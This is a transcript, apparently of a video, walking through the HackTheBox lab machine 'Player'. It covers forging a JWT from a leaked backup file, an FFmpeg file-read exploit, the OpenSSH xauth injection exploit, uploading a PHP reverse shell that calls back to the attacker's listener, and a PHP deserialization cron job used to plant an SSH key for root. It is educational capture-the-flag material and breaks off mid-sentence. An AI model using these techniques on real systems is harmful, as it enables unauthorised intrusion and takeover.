What's going on YouTube? This is Ipsec and we're doing Player from HackTheBox, and I really like this box because there are two solutions to it, the intended and unintended, and both are really awesome and pretty unique from each other. So essentially you're getting two videos in one with this box. It starts off with finding three different subdomains, dev, staging, and chat. If you're really good at recon and you find the dev one and find the framework being used and do a lot of research, you can find a vulnerability in that framework and just pop the box from there. But the intended solution involves you finding old backup files in one of the directories that contain a secret to create your own JWT token to let you log in. So you create the forged token, get access to a different place that is a video processing thing. There is a FFMPEG vulnerability that's a local file inclusion to let you get different files. And you find credentials that let you log into SSH, but you're in a super limited shell. But there is a exploit within that SSH version that lets you read files to let you get another file that has credentials to a web upload form, so you can upload a PHP Rev Shell and get a shell in the box. And then you can use the su command to switch to the user you had previously and bypass the limited shell. Additionally, you could just look at the running crons on the box, and there's a PHP file that runs every minute with two vulnerabilities, one being a serialization vulnerability and the other just including a file you may have write access to. So with all that being said, I'm sure you're confused, so let's jump in. As always, we can begin with the Nmap, so -sc for default scripts, SV enumerate versions, OA output all formats, put in the Nmap directory and call it player, and then the IP address, which is 10.10.10.145. Can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's a Ubuntu server. We also have HTTP on port 80, and its banner is telling us it's Apache HTTPD, and then the Nmap script HTTP-title is giving us a 403 forbidden, and then this service info right here is telling us the hostname is player.htb. So let's go take a look at the website to see exactly what the forbidden is. Maybe it's giving us some type of login prompt that has guest authentication. And it doesn't. We just get a / forbidden. And oddly enough, I don't see player.htb anywhere. So I don't know exactly why Nmap is able to detect the hostname. So I'm always curious when Nmap does something I don't expect. So let's just open up Wireshark and sniff this. So going into Wireshark, selecting ton 0 because that's the adapter for OpenVPN, and then just rerun the Nmap script. So I'm going to do nmap-n to ignore DNS, sc scripts, sv enumerate versions, -p 80 to only do port 80, and do 10.10.10.145. So let that run. We should see everything in Wireshark, so we can just press Ctrl F to open the find, search for the string player.htb, change the display filter to be a string, and then change it from packet list to packet bytes, and search everything, and we don't see anything. Let's just search for player, and we get a few hits. So right here, we see the 403 forbidden, but down here, it's saying server at player.htb. So let's follow this HTTP request and see what happened. So we're doing a get via HTTP 1.0, and the server tells us it can't find player.htb. So let's go over here and edit this request and redo what Nmap did. So go here, intercept Control R to forward it to repeater, and then if we send this, we just see the IP address. So let's change it to HTTP 1.0 to kind of mimic what Nmap did. And we still see just the IP address. So let's only send that, delete everything else, and we get server at player.htb. So that is how, if you don't have all these details, it defaults somehow to player.htb. So looking back over this, if I just send the normal request, it's putting the IP address here. So I'm going to change the IP address in this host field to be please subscribe, and then click send, and we see we have updated the error message to say please subscribe. So this host field is reflected here. And it's not really interesting to be able to change it. It's just interesting to know that if you don't have one, it's defaulting to the hostname of the box. So just a way to get that information. And again, the default Firefox is to always put what you have in the search bar in this host field. So that's why it is saying 10.10.10.145. So with that knowledge, let's go and edit our host file. So I can close out Wireshark and then just do v etc host and then add 10.10.10.145 player.htb. And we can see if this brings us to a different website. So I'm just going to turn intercept off. And instead of 10.10.10.145, I'm just going to go to player.htb to see if it has some type of virtual host routing that brings us to a different page. And it doesn't. I'm just going to intercept my request to double check everything. So we can see the host is set to player.htb for virtual host routing. Click forward and we still get this. So at this point, we have to do a GoBuster. So I'm going to do, before I do GoBuster, I'm also going to do a full port scans, and it's a habit you should get into always doing. So we'll just do nmap-p 10.10.10.145, and we forgot -OA for output all formats, nmap player-all ports. So let that run, and then we need to do a GoBuster. So GoBuster dir -u http player.htb-w for word list, user share word list, and then dirbuster, then directory list 23 medium.txt, and -o for an out file, and we'll call this gobuster-dir-root.out. So let that run. And I'm also going to do something different. I'm just going to use GoBuster to do a virtual host brute force as well. So the word list I'm using is going to be in the seclist package. So you can just do apt install seclist to get this word list. So gobuster-h, I'm going to do vhost-h, and this is going to brute force virtual host. So let's do -u for URL, http player.htb, and then for the word list, we're going to specify user share seclist, discovery, DNS, and let's do subdomains top million. I don't really know what a good one is. And you can see what that's doing is it's just brute forcing by adding all the subdomains in that word list. So what I'm also going to do is -o for out file, and we'll call this gobuster-dns-player, maybe. I don't know. And I probably should do .out. So let's clean up that one I did here. So we can delete that. And if we do grep-v 403, because if we go back here, we see it's putting every status, and 403 is a valid one for some reason. So I'm going to do gobuster-v, gobuster-dns-player, and we can just see anything that gave us a 200. So we have dev, staging, and chat. So v etc host, and add dev.player.htb, staging player.htb, and chat.player.htb. And if we go back to our recon tab, we can see everything else going. We can just rename this whole tab to recon. And at this point, we have a lot of data. So let's open up Cherry Tree and start taking notes. So Control-N to create a node, Control-Shift-N to create a child node, and notes. Hostname leak by not supplying host. Just an interesting note. And then I'm going to create a node for HTTP, and then we're going to create player.htb. I'm going to create dev.player.htb, create chat.player.htb, and we're going to create staging.player.htb. So we're going to take notes on each of these websites. So first off is player.htb, which is just forbidden. And we are currently running GoBuster. So we can ignore this one, the next one I'm going to go to is dev. So we can do dev.player.htb. Check what this one's about. We can just turn intercept off. And we get a login prompt. So if I do admin, incorrect username or password, admin, and then SQL injection equals 1. And I just did the standard or 1 equals 1 thing for SQL injection. And that didn't work. So we don't really have anything here. Let's kind of see what this technology that's building this page is. So I'm going to press Control-U to view the source. And we're going to look around to see if it's leaking, like, is this WordPress, Joomla, what is this? And don't have anything right now. The next other thing we could do is, instead of just going to slash, we could try slash index.html, and we get not found. We can try index.php, and it brings this page. So we know this page is PHP. So if we do a GoBuster here, we can always add the extension .php, and then clicking around, if we go to this JavaScript file, we can see this is using the Codiad framework. So go here, and framework equals Codiad, and we can say the place we found it. And if we look at Codiad on GitHub, we can see that it is currently unmaintained. So it's no longer being updated, and one of the intended routes is actually exploiting this that I think is exploitable in the latest version. But that is an unintended route, so we'll leave that for the end of the video. And at this point, I guess we can move on. Maybe we can add a to-do and run SQL map, but I don't want to run SQL map right now because we have quite a bit going on in recon. So let's go and check out chat. So chat.player.htb, and we have a internal chat. So I'm going to screenshot this with Control-Shift, print screen. I can find where that key is. There we go. And copy this, go over to here, and then paste the screenshot. So we can try clicking around to other chats. We don't really have anything. So the note is someone saying there was a pen test report, and Vincent is saying they mentioned a staging exposing some sensitive files and main domain exposing source code, which allows them to access a product before release. Currently, the team's working on a fix. And then the project manager just says, okay, be sure to sandbox it. So if I had more time and was actually doing the box, I'd probably go here and create another node saying users, and then put all these names. So like Vincent, and then put core dev, and go down the list and adding everyone, because you never know when that comes in handy. So the key thing to know is there's probably some exposed files somewhere. So we can check the source to see if there's anything else on this page, but spoiler, I don't think there really is. So we won't go and just look at HTTP source for 10 minutes. The next step was staging. So we can go to staging.player.htb, and this exposed some sensitive files as well. So if we go here, let's see. Hi there, this is Mr. Robot Core Dev. Firefox can't load this page. Okay, so that's just an image file. Just trolling me. So the site is getting back up. We click around to see what is here. Everything is static images, so I'm not really looking at these. We could try to fuzz parameters and update.php, but nothing looks interesting there. Contact core team. And if we go to about playbuff, nothing happens when I click this. So let's do email ID, name, Nick, and message, hello there. If we do submit, and we get a 501 internal server error. So something happened interesting before that, and we got text. So I'm just going to try email ID. Let's put a valid email here, test@gmail.com. Click submit, and we see the same thing. So what I want to do is intercept this request and see exactly what just happened. So get here, send it to repeater, click go, and we're getting some files. So var www staging contact.php. So this just leaked probably the location of where staging is. It's var www staging. And we can guess the location of other places. So I should move this to a child node. Screenshot chat log, paste that. And we can do location and do chat.player.htb. And I'm putting a question mark here because this is unverified. So go to dev, and we can add location, question mark, var. Oh, not. I wanted to copy the path. So chat and dev, var www dev, and here we can do location HTML. So it's always important to try to map out exactly where each subdomain is. So just having that for now, we can go on to see other things. So we have Cleveland, there is a contact.php file, and database connection failed, unknown variable user in var www backup service.config. So we should definitely check out this file and add this to notes. So a config file. And then we also know this is a valid file. So definitely valid files. So just adding these, and this will be useful if we ever get like a LFI vulnerability, that we know these things exist. So let's move on, and if we went back, I think this even said it. No. If we follow redirection, we just get a forbidden. Okay. So if we go back to a GoBuster, we do have a /launcher directory at player.htb. So we can check that out. So let's go kill this by just turning burp off. And we can do player.htb/launcher. And we get a page called playbuff. And it says enter your email. So let's enter test@gmail.com. And actually intercept this to see if anything interesting happens. So go to proxy, intercept on, send, and we're getting a file. So let's just send this to repeater so we can see what happens. Gives us the a cookie and says 302 found, follow redirection, and we go back here. But our browser didn't add that cookie, so maybe that did it. So when we have that cookie, it's directing us to this PHP file, it looks like, which is, I think, the same thing. If we refresh this page, send to repeater, it looks to be the same thing. So all it did was give us some extra information. And also, this cookie looks like it's in a format that I can eyeball. So I see 3 strings of base 64 separated by periods, and we've gone over this a few times. In Luke, we did it, and then Craft, we also did it. This is a JWT token. So if we base 64 decode, and we can see our recon, Nmap also found another port. So add into the notes under to do port 6686. So echo-n base 64-d, and we can see the header of a JWT token. Go back here and copy this second piece. and go to echo-n, paste this, base64-d, and we can see the contents of the token. So project is playbuff and access code is whatever this is. If I do echo-n, paste wc-c, it's 40 characters, so probably a SHA-1 sum, because I think SHA-1 sum is 41 characters. Let's check this out. SHA-1 sum, awk, print1, wc-c. Yeah, so this is a SHA-1 sum, it looks like. And then the last piece of this JWT token is just for assigning. So it's some type of secret that is ran against this entire thing, and that makes it so we can't edit this token. We could send this over to Hashcat and try cracking it, and we could also go back and look at other things. Specifically in the chat, they mentioned staging is exposing some sensitive files and the main domain exposing some source code, which allows them to access the product before release. So it's kind of a vague hint, and BurpSuite is definitely good at finding this type of thing. So if you do player.htb, and then we could do like right-click, engagement tools, discover content. And what this does is has a thing to like append a bunch of extensions and things that are common in backups to find hidden things. But this is a paid feature, and I hate showing off paid features, so I went ahead and coded an additional thing in GoBuster to do this. So let's go over the code I added so you can kind of understand it, and then we will run it and see what it finds. So we run git log, and this will show all the commits, and I'm just going to look for the first commit that is not by me, and we'll go to Firefarts commit. So we can just copy this, and then we will do a git diff and paste this. So the very first change is on the README file, and I'm just adding a flag, DiscoverBackup, which is -d. So the next thing is CLI cmd.go, and this is again just doing stuff. So this flag acts as a Boolean, and then again, more just stuff to handle the argument. All the main code is over in this GoBuster.go. I'm adding the path library and then adding a bunch of code here. And it'll probably be easier to go over this if we open up the whole module. So let's go vim, paste this in, and go to the run function, because this is the heart of GoBuster, at least this dir mode. So let's see, right here. So this is where it's processing all the word list. And the very first thing it does is just brute forces it raw. So this is just taking each item in that line and doing a git against the URL and recording the response and the size. And if there's no error, or if there is an error, return it. Otherwise, create this ret variable, and this is a slice, I believe, which think of it as just an array. And this is where all the pages are eventually going to get added to. So if we have a response and the status code is not blacklisted and it's one of the ones on our parse list, we will append it to this ret thing. So this is just a giant structure, slice, array, whatever you want to call it. And it'll contain a valid entry, and each one will have entity, status code, size, and status. And then at the very end of the program, when it wants to display output, it's just going to go over this and output it. So hopefully that makes sense. The next thing it's going to do is essentially the same thing, but for all the extensions. So this is if you do the -x, it will add all the extensions you want. And then again, does the same thing and appends everything to this ret. So here's where the code I added is, and we'll go over this a bit more in depth. If the option discover backup is set, then do a loop for everything in this slice. So for _, R, and R is going to be each item in this, and this underscore is just a integer, just counting off the number. It's not really that important, so I don't use it. The next thing is if d.options.statuscode parsed.contains our.statuscode, and that is going to be the page's status code. So for every page that we hit that was a status code we cared about, and if you do like go back over to this GoBuster command, status codes by default are 200, 204, 301, 302, 307, 401, 403. So if the status code on any of the hits was this, then we will go into our logic. So right now I'm creating the slice file names, and we are creating an array of backup extensions. So for each backup extension, I'm going to append the extension to the file name. So right here, we're going and looping through the squiggly.back.back2.old1.1 and appending that to the actual file. So this becomes like index.php this, index.php.back, and you get the gist. And then I'm going to strip the extension and do it again. So instead of index.php, it's going to do index that, which you normally don't see, but like index.back you'll see quite often, index.back2, etc. So that's what it's doing here. And then I also coded something in that I don't think BurpSuite does, and that looks for like vim swap files. So like if we look at our current directory, so GoBuster, GoBuster dir, do a lsla, we can see because I'm in Vim, it created this swap file for me. And that is so if we kill it, we can do this and it says, hey, the swap file exists. And if you want, you can press R to recover and go where you left off. It's like an autosave feature. So we can recover and it just finds those. And then again, here's the logic that you saw before in the dir mode and extension mode, and that is just to go get all the pages. So that is what the change I did does. So let's look at how we use this. So we're in player, and I'm going to go back into burp, and we want to get these two files to see backups. So we know this file exists in index.html. So I'm just going to send this to repeater, and we'll manually create the word list. So copy this, v custom word list, paste this in, and I think the other one was E. We get a target, same exact thing, but ends in E. I'm also going to do D, CDE, and I can do like A as well, but those aren't too important. And then do index.html. So now I'm going to do GoBuster or /opt GoBuster, because that's where I have my custom version compiled. Dir mode -u http player.htb/launcher, and then -w for word list, custom word list. If we just run this, we can see what it sees, nothing too interesting. If I add the -d flag, that's going to search for all my custom things, and we find there is a .php with a squiggly mark at the end. And if you really wanted to see exactly everything it tried, we could do -s for status codes and add 404. And wait, oh, we didn't add 404. I said it, but didn't type it. And it does like a request to a random file, and if it doesn't if it's accepted, then it says, hey, you need to add this wildcard switch. So because there's no way for GoBuster to know exactly when a file doesn't exist, it errors out. So we're going to add the -- wildcard to say, hey, we don't care if you can't identify if it doesn't exist. So running this again, you can see everything it searched for. So it'll probably be easier if we change this to be one file. So I just created the file test. So if we just do -w test, we can see everything. So here's the original file, appended a squiggly, got rid of the .php, had the squiggly, .back, got rid of PHP back to, and you get the gist. And then down here, we're doing the swap file. But a lot of that said, just to find this one single file. So we can go over here and grab it. And we should also make sure intercept is off. And check this file out. And it looks like it is some source code. So it looks like it's probably going to be the source code to this file. And what it's saying is, well, we get the JWT key. And let's see, location, index.html. So it's directing us to this page if the JWT token has the variable access code and it's set to this. And you remember the other access code, maybe we have it in repeater still. Right here. Oh, we have to base64 decode this. So you just go decoder, decode as base64, this C0B, and this is the access code we currently have. So we want to set the access code in a cookie to be this. So the quickest way to do it is just go to jwt.io, and it'll help you create the token. You could do like the PyJWT Python module and do it that way, but we've done that a few times, so I want to show this way. So let's go back to Burp, and we want to copy it, go to JWT. Oh, it just wants the token. So let's go to the repeater tab, grab this, paste it in, and can we edit this? Yes, we can. So what we want to do is go back to the source code and copy the access code and put it here. And we also have to copy the secret key. So we'll copy this and paste it in here. And now we have a token. So let's go and let's see. I don't have any request to that PHP script. So let's turn intercept on. Go here. Copy the URL. Oh, we have it here. Just go to the PHP script. BurpSuite was off. Go to the PHP script, and we will update our access token. So let's go here, copy, here, paste, send it to repeater, click go, and we get an internal server error. So let's go take a look at the code, and I see just above this, it is doing a base64 decode, and here we have secret is base64 encoded. So let's just click that option, copy the new token, and go here, paste this in. We get a 302 found, and it's directing us to the location. So if we follow the redirection, we get a new page. So let's go back to the proxy, paste that token in, forward it, and follow the redirection. And now our Firefox window is at a new page. Welcome to Playbuff. Compact, secure cloud. Compress and secure your media. Select a file to upload. So let's do what it says and upload a file. I'm going to go to Browse, and I'm just going to specify etc passwd, and we're going to upload that. And the key I did to do that is Control L to enter this typing window. So try to upload passwd. I'm going to intercept it and watch the request as it goes. So we're still sending this access JWT token. Probably not need anymore, but just submitting the file. So we click forward, and we go to this index.php. We got a token, and that looks like a timestamp maybe. Let's see. What is the current epoch time? Off. Current epoch time. 157, and that was 177. I am way off. So that's not a timestamp. And I guess we can just click forward. And the page says compressing done. You can access your media at below. So if we look at this link in the bottom left, it is in the uploads directory. And it's also giving us an AVI file. So if we try to find it, it says not found. If we search uploads, we get a forbidden, so we can't do a directory listing here. So it's doing something, and it's expecting AVI files. And a popular codec for processing video is FFMPEG. So I'm just going to do FFMPEG file upload vulnerability. And you'll see a lot of things. The first one being a Payload All The Things thing that has a bunch of things to generate LFIs. So I'm going to download this repo. So we just go to cd/opt and then git clone on the Payload All The Things. Probably one of the more useful repositories of anything. So let's go in here, and it was cd, not file inclusion. Where was that? Payload All The Things, upload insecure files. So you can do an ls and see every hint it's giving you when you can upload a file. You got the zip slip here, picture resizing, etc. But the one we want is this CVE FFmpeg. So let's go into this directory, and we'll do gen AVI bypass. So Python 3 gen AVI bypass, and let's see, it wants the file name and then the output. So we'll do file etc passwd, because we know this exists on the server. And then the output AVI, we're going to do root HTB boxes player, and let's make dir AVI passwd.avi. So back to the page. Let us try uploading that. So go to browse, Control L, root, HTTP, boxes, player, AVI. So we're uploading passwd.avi, submit, buffed media, and not found. Let's try this again. So refresh the page to make sure it's new. Here, submit. Click on buffed media, and it's taking a while to respond. So I'm guessing I had just uploaded something in the cache and it did a file again. So I'm going to open it in VLC, and we see the output of the command, and it's currently says staged-dev. And I don't have that in my passwd file, so I know it's actually running on the server. So if I cat etc passwd grep stage, it's not there. So we have a way to include files from the server. So the first thing I want to do is try checking out the fix.php file. And that was in, where was it? We took notes of it in Cherry Tree. So let's go to staging, no, chat, no, dev, no. I thought I took a note of it. Notes, yeah, here we go. Ver staging fix.php. So we can close that and paste this in. Click browse, upload, submit, buffed media, and we get an AVI. It's only 8.5 kilobytes, much smaller than the other one, which was over 100, and we get nothing. So it looks like we can't really do PHP files. So I'm going to try one last thing to see if we can get around that. I'm giving it this file parameter. I don't know if this is being processed by PHP or VLC. So I'm just going to test out the PHP wrapper to see if it is. So if we do PHP : / and then filter convert.base64-encode / resource is equal to that. And we can try this. So right now I'm hoping we can't include it because PHP is processing the file. So what I did was tell PHP to base64 encode it, which gets rid of the PHP tags. So because it's base64, that doesn't exist, and it no longer executes it. So let's try this. Click submit, buffed media, and it's still 8.5. So that did not do it. And I should let you know, I did modify my VLC. I forgot to mention it because by default, VLC does not allow root to run it. So I did this really stupid thing and changed that. And how I changed it was by running ltrace against VLC, or maybe strace, I forget which one I did. But anyways, examined exactly what the program was doing when it started up and saw it made a call to get EUID, get effective UID. So all I did was do which VLC to find out exactly where the binary is and do sed-i and then search for get EUID and replace it with get PPID and specify the binary, bin VLC. So now whenever it makes a call to get EUID and searches for it being equal to 0, it now runs get parent PID, which will never return 0. So that's how I'm running VLC as root. Probably not the smartest thing to do, but oh well. But back to the LFI of finding files. We have confirmed we have LFI against the file system. We can't get PHP files, and we can't use like the PHP filter to do base64 encoding. So there's another file that we mentioned. So let's go back to cherry tree, and that is backup service config. So let's copy this file, and then we will paste it. So this will be service config, and the file will be the backup service config thing. So go here, browse, service config, submit, buff media, and now it's taking a little bit longer to return, so that's a good sign. We have VLC media player, it's 300 KB, and now we're watching the video. If we go like frame by frame, we can see the entire contents. And right now we have credentials, the user telegen, and a weird password. So let's go here, Windows key L. Ooh, why that? Okay, let's actually go to cherry tree, Windows key L to move it over to the left side, and we can do a thing, creds, and we can say telegen, and then the password is D-B capital C pipe JC exclamation to UEP S/W. Weird password, but definitely useful. We could right away go and test this out because there was one place that we had creds to that we didn't have creds, but we had a login prompt, but no way to log in. So we could try this, telegen, and log in, and we get invalid username and password. So that doesn't work. Other files we can really do or try to check if there's a host file that we missed. So if we do Python 3, we can call this Apache Config, and then the config location, it's probably the same as on my Kali. ls etc Apache 2 sites available 000-default. So let's try this. etc Apache 2 sites available /000-default. Okay. And just for a sanity check, I want to make sure I did that correct. So run file against that. Can't open. So glad I did that sanity check. Default.conf. So default.conf. And that should be good. So let's go back here, play buff, go back, upload Apache config, submit, buff media. Whenever it takes a long time to load, that is a good sign. So around 400 KB, we can open it. And we can see places. I've lost my cursor. Okay. So we can see the virtual host chat, dev, and staging and the locations. Dev is in demo. So we can update this. Dev is now confirmed. It's in demo. Chat is now confirmed. It is indeed in chat. We don't know where root is, but I'm sure if we go here, we may find it. Root 80 for www.html. So we have confirmed all of this. And that is that. Other file we can potentially get, let's try net, N-E-T. And I'm going to grab file /proc/net/tcp. So if I cat this on my box, proc net tcp, we get this, which is essentially the output of the netstat command. It's actually pulling from this file. So if I did nc lvnp 9001 and ran this command again, we get yet another port. So all these zeros mean listen on all interfaces. And the one above this is the 127.0.0.1, I believe. And it's all hex addresses. So what we do is just go Python 3, and then we can do integer of 0x that, and see it is indeed 9001. So that's how that's formatted. So let's see, file proc net tcp, avi net, looks good. So go here, we can go back, and what I'm looking for here is if it's listening on any ports we missed. So we can do submit, buff to media, taking a while to load. Again, always a good sign. We can open it up with VLC, and let's see. Did it have more? Nope, we got 1A, 1E, so we can test that one out. Go back here, whoops. 1A, 1E, 6686, 016. I bet that one is 22. And then 0CEA, I bet that is 80. Oh, 3306. I should have known that's way too low to be 80. So it's got MySQL running in this box as well. Maybe HTTP is running on like TCP 6 or something, or it's in a different file, because we should have seen one for 80, but we didn't. However, that is the way, if you did not do a full port scan, that you'd find 6686. So let's go check out what that port is. Nmap-P 6686-SC-SV 10.10.10.145. And I just like showing other ways to enumerate ports because I normally don't show all ports. So I'm showing you normally by the time you need it, you can find other ways. So we see one banner is OpenSSH 7.2 and the other banner is OpenSSH 6.6. So we definitely have different versions here. So let's try logging in with the credentials we have to these SSHs. So SSH telegen at 10.10.10.145, and we can go here to our creds and copy the password, paste it. We don't get in. We can try -port 6686, paste it, and we get a connection. So if we do ls, we get forbidden command, hit tab twice to see the commands we have. You could also probably type help to see the commands, and we just have clear, exit, help, history, and lpath, and lsudo. Really not much there. So looking at the history, there's not much. Lpath was passed an argument. So if we do lpath/, we get forbidden path. So /home. So we can't even do anything there. So this shell looks like we're kind of screwed. We could try commands like less to see if we can escape, but we can't. So going back to the box, there are two different versions of OpenSSH. So we can do search exploit SSH or OpenSSH to see if there's anything here. And we're on 7.2, and right here there's one saying there's a denial of service. Well, we don't want to crash it, so let's not run that one. But there is this authenticated xauth command injection. So if we copy this and do search exploit -x and see exactly how this works, it's a CRLF injection, but a lot of stuff to read, so instead of reading, let's just run it and see what happens. So we can do mv to rename this file to something that makes more sense, like xauth-ssh.py. Save that, and if we try running it, we get an error message because this is Python 2, not Python 3. Who knows what's going to happen when you try running this, because Python 2 supposedly is getting wiped off the face of the earth January 1st, 2020, and it is New Year's Eve for me, so I can still use Python 2. Maybe that joke doesn't age well, I don't know, but definitely a Python 2 script, so we can do 10.10.10.145, the port 6686, username telegen, and the password is, go over to creds, and copy this, paste that in, and it's got a lot of special characters in it, so I'm going to put it in single quotes. So looks like we have a few commands, read file and write file. So the first thing I'm going to try to do, write file, and I'm going to specify home, telegen, IPsec, and the data we'll just put test. See if we can write anything. And it said forbidden command over SSH, this incident will be reported. So doesn't look like that worked. We can try SSH-P 6686 telegen at 10.10.10.145. Paste. ls. Oh, we don't have ls. lpath. Home telegen. Double tab. Yeah, nothing. So that wasn't a good thing. We can try .write file var www html test and put the contents IPsec there. And then we'd be able to grab it by player.htb/test. And it's not found. So doesn't look like we can do that. The other option we had was read file. So if we go read file and go back to notes, and we grab our staging fix.php file, maybe we can read PHP files finally. And it looks like we can. So looking at this file, we can see a bunch of PHP, and it's modified fix for Peter, and then has something. It ends in a equal sign, so it kind of looks like base64, but has non-base64 characters. So let's try grabbing Peter, going back to creds, and putting these in. Oh crap, that was not copy. Copy, paste, and I'm going to do a question mark right now because that's unverified. So we could try SSH. So SSH, Peter, and the password, copy, paste, wrong, get rid of 6686, paste the password, wrong, and then the other place we could potentially use credentials is on dev. So we do Peter, paste, and we finally have a way to log into this. So your project play buff was loaded and said path doesn't exist. If we right click here, do new file, test, cannot create file. And if you looked at the error message right off the bat, there was the path cannot be found. So let's create a new project. Let's just do please subscribe as the name and the absolute path. Let's do var www HTML and create the project. Yes. Absolute path only allowed for var www demo home. So var www demo home. Create project. Yes. Project please subscribe has been loaded. So new file, test. So if we go to back here, demo was on dev. So if we go demo home, maybe test exist. So let's go to this. Let's go dev.player.htb, demo test. Not found. We just try demo, not found, test, not found, player test, not found, player demo, not found. So it didn't really find anything. So we got to figure out exactly how to use this application. So search, nothing found. Let's rescan. Let's try creating a new project. Ipsec var www demo. Yes. Okay, so I didn't need that /home. But it still exists. Weird. So we got a install.txt file. So let's see if we can find install.txt. So we just go player.htb, install.txt, not found, dev, and we got something. So this is looking better. And that is the same exact file. Where am I? Here. So definitely have it. And let's try uploading a reverse shell. And the reverse shell I always like using is user share lau. Knew what that meant once upon a time, but I don't anymore. I'm going to do PHP reverse shell. I'm just going to call this rev.php. And we'll edit this to look for the IP address. And we'll rename it to what my stuff is. So 10.10.14.2 is my IP address. And 9001. If config ton 0. Yes, I am still 10.10.14.2. So let's do nclvnp 9001 and upload this script. So go here, upload file, click to upload, root HTTP boxes player rev.php. Completed. Going down here, we see it potentially exists. So let's try executing it, rev.php, and we get a shell back. So let's upgrade our shell to proper tty, python-c, import pty, pty.spawn, then bash, Control Z, stty, raw minus echo, hit FG enter, and use enter twice. And then we can do export term is equal to xterm. So now we can clear the screen. So we finally got a shell on this box. I normally would start off by running some type of privilege escalation script, but it doesn't really give us that much information, so I'm not going to waste that time. So if we went into opt privilege escalation script awesome suite, linps, that is a script I would normally run, but you've probably seen me run it 100 times. There's no need to really run it again. So let's just move on and think about what we can do. We had creds to the telegen user, but we couldn't use it because of the shell it's presented. So if we cat etc passwd and grep for telegen, we can see its shell is user bin L shell. However, the su command gives you a -s ability to use a different shell instead of the one default in passwd. And you can use shells out of, I think, etc shells. So we should be able to use any of these shells. So I'm going to switch to bin bash. So I'll do su-s bin bash and then telegen. And then we go over here into a creds, copy the telegen password, paste it in, and we can switch to that user and get user.txt. And, it actually wrote ipsec. And that was test? Yeah, so I was actually writing files with that xauth thing. ls-la var dub is HTML like owned by root. It is. So that's why we couldn't write to it. But we could have wrote to demo. So I think we've just found a different way on the box. For demo, www user can write there. So let's try this real quick. So let's do Python xauth ssh 10 14 oh no 10 145 6686 telegen and the password. Okay. .write file. The path will be var dub and we are demo. So demo test.php and our payload. So I'm just going to do php info and we'll see if this works. So let's go back to our shell, ls, and I don't think I have, we did it in demo. Was demo writable? I don't know if it was. lsla, demo is writable. So ls demo /test.php cannot access. Let's try that again and put quotes around it. So let's do write file test.php and then put quotes around this piece. Look at our netcat, and that file still does not exist. Unknown command, write file. Oh, I didn't do a period first. So, copy this, paste, and let's see. Cannot store data, most likely to bad characters. No spaces or quotes. So, no spaces really limits me. So we can try, maybe this will put a space. I really don't think it does, because that's a bash thing and test.php doesn't even exist. So this is going to be a dead end. So let's just exit this. It was worth a shot, but as a telegen user, you could grab user.txt, but the privesc on this box is actually a cron job. So the tool I'm going to use to find the cron job is pspy. So let's just turn burp off. Google this. We'll go to the GitHub. And this is another Go application. I'm just going to grab the 64-bit small version. And then we can move this to a directory. So make dir www, cd www, move downloads, pspy, and python 3-m http.server. And now let's download this. So let's put it in. I guess the home directory is fine. Touch test. Okay, we can write here. So curl 10.10.14.2, 8000, pspy 64s -o pspy 64s. Downloading it. And once this finishes, we can execute it. So chmod +x pspy /pspy to run. So we'll just wait here and see exactly what pops up. We got SSH popping up right there. SSH. So something's executing SSH every 5 seconds. But we just got PHP executing this script. This verlib playbuff buff.php. So let's do an lsla and see the permissions of this. Only root can edit this file. So I'm going to do base 64 against this, and we're just going to copy it to my box. Actually, colors are working. Let's try Vim here. Sweet, we got syntax highlighting. But the TTY is a bit screwed up. So I'm going to go back here, stty-a, rows 34, columns 136. So we can do stty rows 34, cols 136, and do Vim again. And now it's fixed. So the very first thing I see is this include. So I'm just going to head this file. If I was better in Vim, I'd just execute a command within the Vim terminal, but not confident of doing that without fumbling around. So we're just going to copy this and look at this file. And we can see it is owned by www-data and read write. So if we just put PHP code in here, it would run every minute. So this is an unintended thing that we'll do when we do the whole unintended path. And that is doing this whole box without that whole AVI uploading thing. Just getting a code execution straight off of dev. But looking at this, we can see a unserialized call. And I had just put out a video a few weeks ago on exploiting PHP serialization. And I didn't do that with the intention of this box. This was just a pleasant surprise. So we can see the class playbuff contains a wake-up function. So this is one of the magic methods that allow us to do badness. So I'd really recommend just going to my channel and watching the 2 PHP unserialization videos. There's a beginner and advanced one. So we're just going to do this. So I'm just going to create attack.php and we'll paste this in. And we have to put this in PHP tags. And let's see. Public function wake up. We don't want that. We just want construct. And I think it's still 2 things. And we can do this log file is equal to, and we can put any file we want. And let's see exactly how it uses it. The file put contents, though, does put a dir first, and this is current working directory. So any file we want, we should put a bunch of ... slashes to escape whatever the current working directory is. And then let's put a file. We can try root.ssh authorized keys. And then the next item we want is log data. So this log data, and we want to put a SSH key here. So let's generate one with SSH-keygen, and we can just call this player. And then we can cat player.pub and copy this. And I'm also going to chmod 600 player before I forget. And we can just paste the key in. Okay, that looks good. And then the final thing is to create the object. So obj is equal to new play buff. And then serialize object echo, and I'm going to just put a echo on a new line. So PHP attack.php gives us this object, so we can copy it and go back here. So var log playbuff logs.txt. Oh no, it's taking var lib playbuff merge.log. Playbuff merge.log. So we can do vi var log playbuff merge.log. Paste it in. And maybe echo-n. I probably should put that in single quotes. To var lib playbuff merge.log. So if I cat this file, it is a object, and we can do a date command, and it looks like I literally just missed it, and it's a new year on the server, but not for me. So let's just wait until this finishes. So I'm just going to do sleep 35 and pause the video. It should be a new minute now. So let's go and do sh-i player and do 10, 10, 10, 145. And hopefully we get in, which we do. So if we go to cd.ssh, lsla, and we can see the authorized key file was created like 16 seconds ago. So that is that way. If you didn't have like a .sh directory created, you could always just drop like a cron tab, or there's a bunch of other ways you could do it. So file write as root, you generally get code execution. So let's do the unintended method, which there's going to be two different ways we get code execution. One from when we get Peter's credentials, and the other one from soon as we find the dev page. So the dev page one is funner, so that's the one we're going to start with. I'm just cleaning up my panes so we can get a fresh start. So this should be fine. Actually, it'll be handy if we are root when we do this. So sh-i player at player.htb. So now we have a root shell. And let's go back here. So starting all the way over, we're starting at dev.player.htb is the logout function. Let's just clear everything. Clear history and clear data. So we're at dev.player.htb, and if you went and looked at the source and noticed this and went down the Codiad path, you would find various exploit paths. If you just search for Codiad exploit, you come across this GitHub, which does require user credentials. However, there are CVEs. I'm not positive if the blog post has a CVE now that I'm thinking about it, but there is a second path. This one, I'm actually not sure. I haven't ran this script. I just heard it works. So we'll run this one blind and analyze it with BurpSuite. But the other one is how I had done the box, and I don't remember how I actually found it, But if we search for Jian Shu, git shell Kodiad, it should pull it up right here. And this is in Chinese, and I guess Kali does not have the language pack, so it's not displaying that. And unfortunately, also, all the online translations didn't work on this website. That didn't even go to the correct one. So if we did translate 